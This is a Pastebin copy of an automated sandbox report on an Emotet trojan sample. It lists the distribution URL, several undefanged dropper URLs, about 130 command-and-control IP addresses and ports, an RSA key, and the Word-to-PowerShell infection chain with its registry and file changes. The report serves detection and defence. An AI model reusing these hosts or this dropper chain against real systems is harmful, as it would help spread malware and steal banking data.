Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- REM See https://imgur.com/yxuUH09
- REM EMOTET DOWNLOADED FROM https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct
- REM ONLINE SINCE 18 DECEMBER
- REM DISCOVERED BY @Cryptolaemus1
- REM TRIAGE https://tria.ge/reports/200106-x2rer1qf2s/task1
- windows10_x64
- https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
- 10
- MALWARE CONFIG
- SIGNATURES
- TTP Categories3
- Signatures16
- PROCESSES9
- NETWORK
- TCP
- UDP
- ICMP
- REPLAY MONITOR
- BACKEND
- horse2
- MAX TIME KERNEL
- 143s
- REPORTED
- 2020-01-06T08:01:59Z
- RESOURCE
- win10v191014
- SCORE
- 10
- SUBMITTED
- 2020-01-06T07:58:52Z
- TAGS
- trojan,banker,family:emotet
- TTP
- T1112,T1012,T1082
- Target
- https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
- Filesize
- N/A
- Completed
- 2020-01-06 10:01
- Score
- 10
- /10
- MD5
- N/A
- SHA1
- N/A
- SHA256
- N/A
- emotet trojan banker
- Extracted
- Language
- ps1
- URLs
- exe.dropper
- http://wingsingreen.com/wp-admin/ujs427/
- http://wingsingreen.com/wp-admin/ujs427/
- exe.dropper
- http://nakhlmarket.com/bhbl/718727/
- http://nakhlmarket.com/bhbl/718727/
- exe.dropper
- https://josesmexicanfoodinc.com/inquire/o415773/
- https://josesmexicanfoodinc.com/inquire/o415773/
- exe.dropper
- http://stonearyan.com/flashchat/0cnsb31/
- http://stonearyan.com/flashchat/0cnsb31/
- exe.dropper
- https://mustakhalf.com/a5lgi/h58a6u0435/
- https://mustakhalf.com/a5lgi/h58a6u0435/
- Extracted
- Family
- emotet
- rsa_pubkey.plain
- -----BEGIN PUBLIC KEY-----
- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
- j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
- fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
- -----END PUBLIC KEY-----
- C2
- 68.187.160.28:443
- 68.187.160.28:443
- 97.120.32.227:80
- 97.120.32.227:80
- 187.188.166.192:8080
- 187.188.166.192:8080
- 144.217.117.207:8080
- 144.217.117.207:8080
- 96.126.121.64:443
- 96.126.121.64:443
- 104.236.137.72:8080
- 104.236.137.72:8080
- 85.234.143.94:8080
- 85.234.143.94:8080
- 68.174.15.223:80
- 68.174.15.223:80
- 63.246.252.234:80
- 63.246.252.234:80
- 93.148.252.90:80
- 93.148.252.90:80
- 74.59.187.94:80
- 74.59.187.94:80
- 185.160.212.3:80
- 185.160.212.3:80
- 46.28.111.142:7080
- 46.28.111.142:7080
- 183.99.239.141:80
- 183.99.239.141:80
- 68.129.203.162:443
- 68.129.203.162:443
- 144.139.56.105:80
- 144.139.56.105:80
- 191.183.21.190:80
- 191.183.21.190:80
- 81.157.234.90:8080
- 81.157.234.90:8080
- 138.68.106.4:7080
- 138.68.106.4:7080
- 203.130.0.69:80
- 203.130.0.69:80
- 181.36.42.205:443
- 181.36.42.205:443
- 190.97.30.167:990
- 190.97.30.167:990
- 94.200.114.162:80
- 94.200.114.162:80
- 149.62.173.247:8080
- 149.62.173.247:8080
- 188.216.24.204:80
- 188.216.24.204:80
- 85.152.208.146:80
- 85.152.208.146:80
- 116.48.138.115:80
- 116.48.138.115:80
- 50.28.51.143:8080
- 50.28.51.143:8080
- 190.210.184.138:995
- 190.210.184.138:995
- 83.165.78.227:80
- 83.165.78.227:80
- 68.183.170.114:8080
- 68.183.170.114:8080
- 186.15.83.52:8080
- 186.15.83.52:8080
- 93.67.154.252:443
- 93.67.154.252:443
- 74.79.103.55:80
- 74.79.103.55:80
- 152.170.108.99:443
- 152.170.108.99:443
- 111.125.71.22:8080
- 111.125.71.22:8080
- 68.183.190.199:8080
- 68.183.190.199:8080
- 93.144.226.57:80
- 93.144.226.57:80
- 82.8.232.51:80
- 82.8.232.51:80
- 37.187.6.63:8080
- 37.187.6.63:8080
- 200.58.83.179:80
- 200.58.83.179:80
- 217.199.160.224:8080
- 217.199.160.224:8080
- 86.42.166.147:80
- 86.42.166.147:80
- 91.74.175.46:80
- 91.74.175.46:80
- 97.81.12.153:80
- 97.81.12.153:80
- 125.99.61.162:7080
- 125.99.61.162:7080
- 207.154.204.40:8080
- 207.154.204.40:8080
- 14.160.93.230:80
- 14.160.93.230:80
- 87.106.77.40:7080
- 87.106.77.40:7080
- 109.169.86.13:8080
- 109.169.86.13:8080
- 91.205.215.57:7080
- 91.205.215.57:7080
- 82.196.15.205:8080
- 82.196.15.205:8080
- 96.61.113.203:80
- 96.61.113.203:80
- 181.198.203.45:443
- 181.198.203.45:443
- 130.204.247.253:80
- 130.204.247.253:80
- 5.88.27.67:8080
- 5.88.27.67:8080
- 82.36.103.14:80
- 82.36.103.14:80
- 2.45.112.134:80
- 2.45.112.134:80
- 190.6.193.152:8080
- 190.6.193.152:8080
- 63.248.198.8:80
- 63.248.198.8:80
- 51.255.165.160:8080
- 51.255.165.160:8080
- 189.19.81.181:443
- 189.19.81.181:443
- 186.68.48.204:443
- 186.68.48.204:443
- 2.44.167.52:80
- 2.44.167.52:80
- 163.172.40.218:7080
- 163.172.40.218:7080
- 201.213.32.59:80
- 201.213.32.59:80
- 151.237.36.220:80
- 151.237.36.220:80
- 77.55.211.77:8080
- 77.55.211.77:8080
- 37.183.121.32:80
- 37.183.121.32:80
- 112.218.134.227:80
- 112.218.134.227:80
- 77.27.221.24:443
- 77.27.221.24:443
- 190.186.164.23:80
- 190.186.164.23:80
- 175.114.178.83:443
- 175.114.178.83:443
- 45.50.177.164:80
- 45.50.177.164:80
- 87.106.46.107:8080
- 87.106.46.107:8080
- 91.204.163.19:8090
- 91.204.163.19:8090
- 188.135.15.49:80
- 188.135.15.49:80
- 190.195.129.227:8090
- 190.195.129.227:8090
- 159.203.204.126:8080
- 159.203.204.126:8080
- 104.131.58.132:8080
- 104.131.58.132:8080
- 185.86.148.222:8080
- 185.86.148.222:8080
- 46.101.212.195:8080
- 46.101.212.195:8080
- 223.255.148.134:80
- 223.255.148.134:80
- 79.7.114.1:80
- 79.7.114.1:80
- 80.11.158.65:8080
- 80.11.158.65:8080
- 190.100.153.162:443
- 190.100.153.162:443
- 203.25.159.3:8080
- 203.25.159.3:8080
- 2.139.158.136:443
- 2.139.158.136:443
- 72.29.55.174:80
- 72.29.55.174:80
- 73.60.8.210:80
- 73.60.8.210:80
- 37.211.49.127:80
- 37.211.49.127:80
- 212.71.237.140:8080
- 212.71.237.140:8080
- 5.196.35.138:7080
- 5.196.35.138:7080
- 185.160.229.26:80
- 185.160.229.26:80
- 91.83.93.124:7080
- 91.83.93.124:7080
- 69.163.33.84:8080
- 69.163.33.84:8080
- 45.8.136.201:80
- 45.8.136.201:80
- 83.248.141.198:80
- 83.248.141.198:80
- 200.119.11.118:443
- 200.119.11.118:443
- 219.75.66.103:80
- 219.75.66.103:80
- 118.36.70.245:80
- 118.36.70.245:80
- 192.241.146.84:8080
- 192.241.146.84:8080
- 45.79.95.107:443
- 45.79.95.107:443
- 116.48.148.32:80
- 116.48.148.32:80
- 62.75.160.178:8080
- 62.75.160.178:8080
- 142.127.57.63:8080
- 142.127.57.63:8080
- 62.75.143.100:7080
- 62.75.143.100:7080
- 119.59.124.163:8080
- 119.59.124.163:8080
- 181.61.143.177:80
- 181.61.143.177:80
- 200.124.225.32:80
- 200.124.225.32:80
- 5.32.41.106:80
- 5.32.41.106:80
- 37.120.185.153:443
- 37.120.185.153:443
- 96.38.234.10:80
- 96.38.234.10:80
- 110.170.65.146:80
- 110.170.65.146:80
- 190.146.131.105:8080
- 190.146.131.105:8080
- 2.42.173.240:80
- 2.42.173.240:80
- 191.103.76.34:443
- 191.103.76.34:443
- 91.117.83.59:80
- 91.117.83.59:80
- 58.171.38.26:80
- 58.171.38.26:80
- 178.79.163.131:8080
- 178.79.163.131:8080
- 113.61.76.239:80
- 113.61.76.239:80
- 99.252.27.6:80
- 99.252.27.6:80
- 139.162.118.88:8080
- 139.162.118.88:8080
- 165.228.195.93:80
- 165.228.195.93:80
- 212.237.50.61:8080
- 212.237.50.61:8080
- 142.93.114.137:8080
- 142.93.114.137:8080
- Defense Evasion
- Discovery
- Process spawned unexpected child process
- WINWORD.EXE
- Powershell.exe
- Reported IOC
- WINWORD.EXE
- Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
- Reported IOC
- Powershell.exe
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
- Emotet
- Executes dropped EXE
- 25.exe
- 25.exe
- acquiretexas.exe
- acquiretexas.exe
- Drops file in System32 directory
- 25.exe
- acquiretexas.exe
- Reported IOC
- 25.exe
- C:\Users\Admin\25.exe => C:\Windows\SysWOW64\acquiretexas.exe File renamed
- Reported IOC
- acquiretexas.exe
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat File opened for modification
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 File opened for modification
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE File opened for modification
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies File opened for modification
- C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 File opened for modification
- Suspicious use of SetWindowsHookEx
- iexplore.exe
- IEXPLORE.EXE
- WINWORD.EXE
- WINWORD.EXE
- 25.exe
- 25.exe
- acquiretexas.exe
- acquiretexas.exe
- Checks processor information in registry
- Matched TTPs
- Query Registry
- System Information Discovery
- Reported IOC
- Process #undefined
- \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key opened
- \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried
- Enumerates system info in registry
- Matched TTPs
- Query Registry
- System Information Discovery
- Reported IOC
- Process #undefined
- \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened
- \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried
- \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried
- Suspicious use of FindShellTrayWindow
- iexplore.exe
- Suspicious behavior: AddClipboardFormatListener
- WINWORD.EXE
- WINWORD.EXE
- Modifies registry class
- Reported IOC
- Process #undefined
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000fdddd5f8bc85d501123bfafabc85d50106eeebfabc85d50114000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_18E5\CHILDREN Key deleted
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_18e5 Key deleted
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\Moniker = "oice_16_974fa576_32c1d314_18e5" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599 Key deleted
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\CHILDREN Key deleted
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2467152819-1057181699-139450947-1524660455-2277496802-2853845521-3887766599\DisplayName = "OICE_16_974FA576_32C1D314_18E5" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (int)
- NTFS ADS
- WINWORD.EXE
- Reported IOC
- WINWORD.EXE
- C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_18e5\AC\Temp\9EFEC9F0.doc:Zone.Identifier File opened for modification
- Suspicious behavior: EmotetMutantsSpam
- 25.exe
- acquiretexas.exe
- Modifies Internet Explorer settings
- Matched TTPs
- Modify Registry
- Reported IOC
- Process #undefined
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c36c9cdac63c12448d84f1a7215689fa0000000002000000000010660000000100002000000012fa5f18d6865b700e027c6fb28203d32ffe030aa5f012bdf468f23ec71e5926000000000e80000000020000200000000b50af3b8eefc5ab870190c0bf2e78599d3ad018f30ce496a9651433821817e82000000044ef929d7727f7f528df008ae06912ff51e03023c24fa434d355e5498fac5ba640000000378bfa167c3f831822c437c4ba86f4b965b49dc29494a63b1d09d137270fb00f37667b3cfdf0166ebf6207954233df4b4420bb2a69e0499bb6fce9cf064d2d1f Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30786671" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "285066144" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D748E002-3062-11EA-BD7F-FAC4F462FE6F} = "0" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "http://go.microsoft.com/fwlink/p/?LinkId=255141" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2887302262" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30786671" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 5d2542a46fc4d501 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f04f6fa46fc4d501 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2887302262" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2917146139" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "https://suncityefficiencytour.it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501 Set value (data)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" Set value (int)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{F5CEA6C9-29B1-4722-9C19-47C8FB0DBC04}" Set value (str)
- \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" Set value (str)
- Suspicious use of WriteProcessMemory
- iexplore.exe
- WINWORD.EXE
- Powershell.exe
- 25.exe
- acquiretexas.exe
- Reported IOC
- iexplore.exe
- PID 4924 wrote to memory of 4972
- PID 4924 wrote to memory of 4628
- Reported IOC
- WINWORD.EXE
- PID 4628 wrote to memory of 4156
- Reported IOC
- Powershell.exe
- PID 4856 wrote to memory of 724
- Reported IOC
- 25.exe
- PID 724 wrote to memory of 5116
- Reported IOC
- acquiretexas.exe
- PID 4260 wrote to memory of 4228
- Suspicious behavior: EnumeratesProcesses
- WINWORD.EXE
- Powershell.exe
- acquiretexas.exe
- Suspicious use of AdjustPrivilegeToken
- Powershell.exe
- Reported IOC
- Powershell.exe
- Token: SeDebugPrivilege
- C:\Program Files\Internet Explorer\iexplore.exe
- "C:\Program Files\Internet Explorer\iexplore.exe" https://suncityefficiencytour[.]it/OLD-HACKED/private-module/security-088ff6mv1qh28x-620/HSzq4G-c7jn8uocnmct/
- PID: 4924
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
- "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\info_408170833067.doc" /o ""
- PID: 4628
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
- "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Embedding
- PID: 4156
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
- "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4924 CREDAT:82945 /prefetch:2
- PID: 4972
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
